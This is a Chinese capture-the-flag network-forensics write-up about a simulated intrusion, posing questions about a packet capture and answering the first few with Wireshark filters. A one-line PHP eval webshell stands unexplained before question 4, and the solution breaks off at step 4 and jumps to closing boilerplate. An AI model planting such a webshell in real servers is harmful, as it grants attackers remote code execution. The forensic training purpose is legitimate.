本文主要是介绍流量分析题,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一、题目背景
某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题
二、关卡列表
1.某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器
2.某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可)
3.某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:username/password)
<?php @eval($_POST['pass']); ?>4.某公司内网网络被黑客渗透,请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码
5.某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么
6.某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少
7.某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么
8.某公司内网网络被黑客渗透,请分析流量,黑客破解了账号ijnu@test.com得到的密码是什么
9.某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip
10.某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号登陆了mail系统(形式: username/password)
11.某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn的ip是多少
三、解题过程
1.黑客使用的扫描器
打开webone.pcap数据包,按照协议类型排序一下,看到http协议的时候,发现了明显的awvs的特征
打开webone.pcap数据包 ,使用 http contains acunetix 发现了很多awvs的特征,说明是用awvs进行扫描的
2.黑客扫描到的登陆后台
登陆后台99%使用的是POST方法,直接使用过滤器过滤一下,然后追踪TCP流,看到302重定向,基本就是登陆成功了
http.request.method=="POST"
3.黑客登录使用的账号密码
但是查看过后我发现有很多302重定向登陆成功的结果,发现了很多账号密码,为了确定黑客所使用的,我找了一下黑客的ip地址,就是刚刚看到使用awvs进行扫描的源地址一定就是黑客的ip。然后使用过滤器再次过滤一下。
http.request.method=="POST" and ip.src==192.168.94.59 and http contains "rec=login"
4.webshell文件名和内容
这篇关于流量分析题的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
